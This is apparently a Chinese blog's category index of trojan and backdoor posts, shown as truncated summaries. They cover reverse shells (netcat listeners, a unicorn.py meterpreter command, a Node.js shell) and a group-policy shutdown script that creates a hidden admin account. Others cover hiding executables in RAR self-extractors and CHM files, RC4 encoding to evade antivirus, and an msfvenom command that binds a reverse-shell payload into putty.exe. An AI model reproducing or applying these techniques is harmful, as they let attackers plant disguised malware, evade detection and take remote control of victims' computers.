随笔分类 - 木马后门
摘要:Invoke-PowerShellTcp.ps1 监听主机:nc -nv -l -p 9999 powercat.ps1 监听主机:nc -nv -l -p 9999 unicorn.py Eg:python unicorn.py windows/meterpreter/reverse_tcp 19
阅读全文
摘要:Node.js反向Shell 摘自:http://www.itfang.net/?p=109 如下的Javascript就是一个Node.js的反向连接shell。 这个payload将会生成一个/bin/sh的shell,创建一个TCP连接到攻击者的服务器,并且在通信数据流中绑定shell命令。
阅读全文
摘要:原文:揭秘Windows系统的四个后门 组策略欺骗后门 创建一个批处理文件add.bat,内容是: (2)利用 上传运行gpedit.msc,定位到“计算机配置一>Windows设置一>脚本(启动/关机)”, 双击右边窗口的“关机”,在其中添加add.bat。 这样就实现了当系统关机时创建hack$
阅读全文
摘要:rar自解压绑马 (1)先用winrar压缩加密文件。压缩后的文件可改为任意后缀名,如.jpg (2)然后将unrar和加密压缩的文件打包成自解压文件。在"提取后运行"里填上"unrar e -p111111 calc.jpg" 然后回车再输入解压后的exe文件名,如calc.exe. (3)打包后
阅读全文
摘要:监听 AutoRunScrip:自动执行脚本 如:自动执行post/windows/manage/migrate 自动注入进程 免杀 将控制端向被控制端发送的stage进行编码,从而绕过symantec的查杀 相当于使用RC4 利用rc4对传输的数据进行加密,密钥在生成时指定,在监听的服务端设置相同
阅读全文
摘要:一. 弹出计算器 打开EasyCHM,工具 -> 反编译指定的CHM,选择目标文件和反编译工作目录。 进入反编译的工作目录,找到并编辑主页文件,这里是index.html 在<body></body>标签内部插入执行代码,这里以弹出计算器为例 代码 重新在EasyCHM中编译这个项目,生成新的文件,
阅读全文
摘要:常见捆绑注入payload手法 Payload捆绑注入 msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=x.x.x.x LPORT=xxx -x putty.exe -k -e x86/shikata_ga_
阅读全文
